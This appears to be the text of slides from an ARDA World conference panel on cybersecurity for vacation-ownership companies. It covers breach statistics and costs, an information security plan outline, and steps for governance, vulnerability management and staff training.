#ARDAWorld From Russia With Love Is your technology vulnerable to data theft? Do you know your own security protocols? Learn about auditing cyber-security processes and discover how to stay compliant and safe from hacking attempts. Tuesday, May 8 from 1:30-2:45
From Russia With Love - Speakers #ARDAWorld Robert Kobek, RRP, President, CustomerCount Donald Smith President, Cybermedic Anurag Sharma, CISA, Principal, Withum Erich Tines VP, IT Holiday Club Vacations Brian Mullen VP, Infrastructure & Ops HGV
Contents of Readiness Document #ARDAWorld EXECUTIVE SUMMARY: MOBIUS VP, LLC INFORMATION SECURITY PLAN Identification and Assessment of Risks to Customer Information Information Security Plan Coordinator (ISPC) Design and Implementation of Safeguards Program Employee Management and Training Physical Security Information Systems Selection of Appropriate Service Providers Continuing Evaluation and Adjustment Summary of Policies, Standards, and Guidelines MOBIUS VP, LLC POLICIES, STANDARDS, AND GUIDELINES Acceptable Use Policy 1 General Use and Ownership 2 Security and Proprietary Information 3 Unacceptable Use Clean Desk Policy Email Policy Employee Turnover Policy 1 New Employee On-Boarding 2 Employee Transfer 3 Employee Termination Off-Boarding Password Construction Guidelines Remote Access Policy Wireless Communication Standards 1 General Requirements 2 Home Wireless Device Requirements Server Security Policy 1 General Requirements 2 Configuration Requirements 3 Monitoring
#ARDAWorld The Hacker Donald A. Smith CyberMedic Intl. www.cybermedicsec.com (517) 706-8359 A+, MSCE, CCNA, CISSP, CEH
Back Door #ARDAWorld
#ARDAWorld How Hard? How Long? How Much? Lets See A Demo!
#ARDAWorld Who and What is Vulnerable? Open WIFI = All USERS Secured WIFI = All TRAFFIC Wired Network = All DATA Encrypted Network=ZERO USERS TRAFFIC OR DATA!!!!
Anurag Sharma (CISA, CRISC, CISSP) Principal #ARDAWorld
Information is the New Oil! #ARDAWorld Companies are collecting and storing large amounts of data on a regular basis. This data may include information about employees, customers, intellectual property/trade secrets and business operations. This data has value to the companies producing/collecting it, to their competitors and to unknown third parties.
Breach Statistics #ARDAWorld Source: BreachLevelIndex.com
2017: Breaches By Region #ARDAWorld Source: BreachLevelIndex.com
#ARDAWorld How much does a cyber breach cost? Two Answers: It depends. A lot.
#ARDAWorld How much does a cyber breach cost? Investigation (IT, legal, compliance, personnel) Remediation (IT, legal, compliance, personnel) Breach notification To affected customers and employees To regulators and enforcement agencies Remedies to affected individuals Credit monitoring Call center costs Additional consequences Regulatory investigation Enforcement agency action Litigation
Cost of breaches #ARDAWorld
#ARDAWorld Information Security Brian Mullen Hilton Grand Vacations
#ARDAWorld SECURITY IS A COMPANY ISSUE CYBER SECURITY IS A CEO ISSUE. - MCKINSEY $ 4.0M 81% >300K 87% is the average cost of a data breach per incident. of breaches involve weak or stolen passwords. new malware samples are created and spread every day. of senior managers have admitted to accidentally leaking business data. CYBER THREATS ARE A MATERIAL RISK TO OUR BUSINESS Sources: McKinsey, Ponemon Institute, Verizon, Microsoft
#ARDAWorld CYBERSECURITY HAS CHANGED CYBERSECURITY USED TO MEAN BUILDING A BIGGER MOAT AND A BIGGER WALL
#ARDAWorld HGV INFOSEC STRATEGY INFOSEC FOCUS Balancing information protection, device health, identity management, and data telemetry with risk management as a foundation. No silver bullets.
Erich Tines VP Information Technology Holiday Inn Club Vacations #ARDAWorld
#ARDAWorld The Statistics: 81% There is a Cyber Attack every 39 Seconds of hacking-related breaches leveraged either stolen and/or weak passwords. 66% 1 out of every 131 Emails contain Malware 230,000 New Malware samples are produced every day of malware was installed via malicious email attachments. Data breach cost a company an average of $3.8 Million It takes about 197 Days for a breach to be detected 3,927% cost Increase of a data breach by 2020 (Data breach will exceed 150 Million). 83% of financial companies suffer over 50 attacks per month, As do 44% of retail. Sources: 2017 Verizon Data Breach investigations Report 10 th Edition https://www.symantec.com/security-center/threat-report https://www.microsoft.com/en-us/cloud-platform/advanced-threat-analytics https://www.pandasecurity.com/mediacenter/press-releases/all-recorded-malware-appeared-in-2015/ http://www.zdnet.com/article/businesses-take-over-six-months-to-detect-data-breaches/
Dedicated Oversight Bring In expertise to oversee and be dedicated to your program Executive Leadership Participation Initiate experienced partnerships Audit Security Program Sample Process: #ARDAWorld Vulnerability Management Establish Asset Management Deploy Dashboard Tools Institute Patch Management Perform Penetration Test Inject Security into your QA Process Governance Determine a Framework to Follow Establish a Security Board Define the Security Program Shape Security Policies Security Awareness & Training IT Security Plan Vulnerability Management Access Management Identify Your Data Define Roles Automate Provisioning Control Access Audit, Audit, Audit! Risk Assessments Security Awareness & Training Define Methodology Identify Assets Understand Threats and Vulnerabilities Qualify Risk (Prioritize) Mitigate to agreed Level Understand your audience and develop a cohesive program Deliver Training Often Test Effectiveness of Training Track Participation Communicate often
#ARDAWorld Talk, Talk, Talk, QUESTIONS?